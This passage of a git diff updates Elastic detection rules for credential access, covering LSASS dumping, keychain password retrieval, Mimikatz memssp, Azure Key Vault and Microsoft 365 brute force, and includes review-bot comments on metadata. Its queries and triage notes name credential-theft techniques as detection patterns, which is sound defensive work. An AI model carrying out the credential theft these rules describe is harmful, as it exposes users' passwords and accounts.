 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json
index 8efd74d4e7f1c..abf7cbece0b36 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json
@@ -14,14 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Key Vault Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KEYVAULT/VAULTS/WRITE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/key-vault/general/basic-concepts", "https://docs.microsoft.com/en-us/azure/key-vault/general/secure-your-key-vault" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -57,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json index b2c42f6b50d92..a7d9fe76a21c6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Keychain Password Retrieval via Command Line", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.name : \"security\" and process.args : \"-wa\" and process.args : (\"find-generic-password\", \"find-internet-password\") and\n process.args : (\"Chrome*\", \"Chromium\", \"Opera\", \"Safari*\", \"Brave\", \"Microsoft Edge\", \"Edge\", \"Firefox*\") and\n not process.parent.executable : \"/Applications/Keeper Password Manager.app/Contents/Frameworks/Keeper Password Manager Helper*/Contents/MacOS/Keeper Password Manager Helper*\"\n", "references": [ "https://www.netmeister.org/blog/keychain-passwords.html", @@ -22,8 +22,31 @@ "https://ss64.com/osx/security.html", "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -70,5 +93,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_handle_via_malseclogon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_handle_via_malseclogon.json
new file mode 100644
index 0000000000000..449a0b88e22b3
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_handle_via_malseclogon.json
@@ -0,0 +1,84 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies suspicious access to LSASS handle from a call trace pointing to seclogon.dll and with a suspicious access rights value. This may indicate an attempt to leak an LSASS handle via abusing the Secondary Logon service in preparation for credential access.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-windows.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious LSASS Access via MalSecLogon",
+ "note": "",
+ "query": "process where event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n",
+ "references": [
+ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html"
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.CallTrace",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.GrantedAccess",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.TargetImage",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "severity": "high",
+ "tags": [
+ "Elastic",
+ "Host",
+ "Windows",
+ "Threat Detection",
+ "Credential Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1003",
+ "name": "OS Credential Dumping",
+ "reference": "https://attack.mitre.org/techniques/T1003/",
+ "subtechnique": [
+ {
+ "id": "T1003.001",
+ "name": "LSASS Memory",
+ "reference": "https://attack.mitre.org/techniques/T1003/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json
index 444d6051c1250..c41287faed87e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json
@@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\")\n", + "note": "", + "query": "file where file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", "https://github.com/hoangprod/AndrewSpecial" ], + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", 
"tags": [ "Elastic", @@ -56,5 +74,5 @@ "timeline_title": "Comprehensive File Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json index 7ac3bf448a672..ce9c7eb3988d1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible\nfor enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles\npassword changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on,the system\ngenerates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single\nsign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be\nharvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using \n[alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment,\nconsider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on\nthe correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect 
the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is 
responsible\nfor enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles\npassword changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on,the system\ngenerates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single\nsign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be\nharvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using\n[alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. 
If this activity is expected or noisy in your environment,\nconsider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on\nthe correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. 
*/\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", 
@@ -20,8 +20,41 @@
 "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html",
 "http://findingbad.blogspot.com/2017/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.AccessMask",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.AccessMaskDescription",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.ObjectName",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.ProcessName",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -56,5 +89,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
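Review bot: The new `setup` string repeats, word for word, the audit-policy, SACL and `event.ingested` paragraphs that the previous hunk still leaves at the tail of `note` (everything after "mean time to respond (MTTR)."), so the same instructions now render twice for this rule, and the `setup` copy has also dropped the links to the Event 4656 and SACL documentation that the `note` copy keeps. The LSASS Memory Dump Creation rule earlier in this diff takes the other approach and empties `note` of the configuration text entirely; the two rules should agree. Either trim `note` to end at the MTTR sentence here, or keep only one copy and restore the references in it, e.g. `Object Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)`. Separately, the three `winlog.event_data.*` entries typed `"unknown"` in `required_fields` look like generator output; if the mapping is known to be `keyword` (as it is for `ProcessName`), fixing the type here avoids a misleading schema hint.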
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json
index d7e78dacd0f5a..204d887636458 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json
@@ -10,13 +10,31 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Abuse of Repeated MFA Push Notifications",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "sequence by user.email with maxspan=10m\n [any where event.module == \"okta\" and event.action == \"user.mfa.okta_verify.deny_push\"]\n [any where event.module == \"okta\" and event.action == \"user.mfa.okta_verify.deny_push\"]\n [any where event.module == \"okta\" and event.action == \"user.authentication.sso\"]\n",
 "references": [
 "https://www.mandiant.com/resources/russian-targeting-gov-business"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.email",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -44,5 +62,5 @@
 }
 ],
 "type": "eql",
- "version": 2
+ "version": 4
 }
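Review bot: The new `setup` text states that the Okta Fleet integration is required, yet this hunk adds no `related_integrations` entry, whereas the two Office 365 rules changed later in this same diff gain `"related_integrations": [{ "package": "o365", "version": "1.3.0" }]` alongside their `required_fields`; the metadata is inconsistent with the rule's own prerequisites, and presumably whatever consumes `related_integrations` will not surface Okta for this rule. Add the corresponding entry next to `required_fields`, e.g. `"related_integrations": [ { "package": "okta", "version": "<minimum version the query was validated against>" } ],`, or, if omission is intentional because the rule also supports the Filebeat module, say so in `setup` so the asymmetry with the o365 rules is not read as an oversight.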
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json
index 26ba1d845ed35..7961d39fb09f8 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json
@@ -16,13 +16,47 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempts to Brute Force a Microsoft 365 User Account",
- "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n",
 "references": [
 "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem"
 ],
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "o365.audit.LogonError",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -56,5 +90,5 @@
 "value": 10
 },
 "type": "threshold",
- "version": 7
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json
index 06f77fe83ba14..c0a691820a0a1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json
@@ -14,10 +14,39 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Potential Password Spraying of Microsoft 365 User Accounts",
- "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and \nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n",
+ "note": "",
+ "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n",
+ "related_integrations": [
+ {
+ "package": "o365",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d",
+ "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -51,5 +80,5 @@
 "value": 25
 },
 "type": "threshold",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json
index e9f699e7a62a1..b322c9ec7d9f7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json
@@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Mimikatz Memssp Log File Detected", - "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp\nmodule, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer\naccount password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is\n being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and 